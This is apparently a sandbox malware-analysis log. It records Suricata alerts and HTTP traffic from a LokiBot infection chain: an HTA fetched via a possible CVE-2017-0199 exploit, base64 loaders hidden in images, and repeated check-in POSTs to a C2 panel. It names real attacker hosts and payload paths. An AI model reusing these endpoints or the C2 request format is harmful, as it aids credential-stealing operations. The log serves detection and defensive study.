          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49220
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49254 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49254 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49207
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49212
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49216 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49248 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49221 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49254 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49240 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49240 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49221 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49240 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49221 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49248 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49240 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49240 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49254 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49216
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49248 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49254 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49240
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49248 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49237
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49254
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49248
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49227 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49221
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49245 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49232 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49232 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49245 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49224
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49245 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49232 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49255 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49255 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49255 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49255 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49255 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49245 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49245 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49232 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49255
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49245
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49227 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49227 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49227 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49227 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49227
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49229 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49229 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49229 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49229 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49229 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49229
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49232 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49232
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49247 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49247 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49247 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49247 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49247 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49247
          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 198.46.178.151:80 -> 192.168.2.22:49188
          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 198.46.178.151:80 -> 192.168.2.22:49177
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49256
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49176
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49169
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/LLORG.txt HTTP/1.1Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/LLORG.txt HTTP/1.1Host: 198.46.178.151Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
          Source: Joe Sandbox ViewIP Address: 104.21.74.191 104.21.74.191
          Source: Joe Sandbox ViewIP Address: 94.156.177.220 94.156.177.220
          Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 198.46.178.151:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 198.46.178.151:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49174 -> 198.46.178.151:80
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 198.46.178.151If-Range: "2a437-625aa58b90e12"
          Source: global trafficHTTP traffic detected: GET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 04:43:43 GMTConnection: Keep-AliveHost: 198.46.178.151If-None-Match: "2a437-625aa58b90e12"
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
